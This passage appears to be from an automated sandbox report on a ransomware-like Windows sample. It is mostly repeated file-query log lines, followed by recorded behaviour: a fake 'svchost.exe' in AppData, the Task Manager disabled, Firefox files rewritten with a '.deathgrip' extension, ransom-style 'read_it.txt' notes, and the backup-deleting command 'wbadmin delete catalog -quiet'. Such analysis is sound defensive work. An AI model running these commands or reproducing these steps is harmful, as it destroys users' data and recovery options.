                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\_ssl.pyd VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\_asyncio.pyd VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\_overlapped.pyd VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\pyexpat.pyd VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\cryptography-42.0.0.dist-info VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\cryptography-42.0.0.dist-info VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\importlib_metadata-7.0.1.dist-info VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\cryptography-42.0.0.dist-info VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\cryptography-42.0.0.dist-info VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\importlib_metadata-7.0.1.dist-info VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\importlib_metadata-7.0.1.dist-info VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\wheel-0.42.0.dist-info VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\win32 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\_hashlib.pyd VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\win32 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\win32 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\win32 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\pywin32_system32 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\win32 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\pywin32_system32 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
                  Source: C:\Windows\System32\vds.exeQueries volume information: \Device\CdRom0 VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                  Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\read_it.txt VolumeInformation
                  Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Roaming\read_it.txt VolumeInformation
                  Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Roaming\read_it.txt VolumeInformation
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_0005EEDC GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0005EEDC
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD676370 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,2_2_00007FF6DD676370
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_0004C345 GetVersionExW,0_2_0004C345
                  Source: C:\Users\user\Desktop\main.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Contains functionality to disable the Task Manager (.Net Source)
                  Source: svchost.exe.3.dr, Program.cs.Net Code: DisableTaskManager
                  Deletes the backup plan of Windows
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                  Disable Task Manager(disabletaskmgr)
                  Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry value created: DisableTaskMgr 1Jump to behavior
                  Disables the Windows task manager (taskmgr)
                  Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior
                  Overwrites Mozilla Firefox settings
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\jones\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\addons.json.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\addons.json.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\addons.jsonJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\AlternateServices.txt.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\AlternateServices.txt.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\AlternateServices.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\compatibility.ini.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\compatibility.iniJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\containers.json.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\containers.json.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\containers.jsonJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\ExperimentStoreData.json.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\ExperimentStoreData.jsonJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\handlers.json.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\handlers.jsonJump to behavior
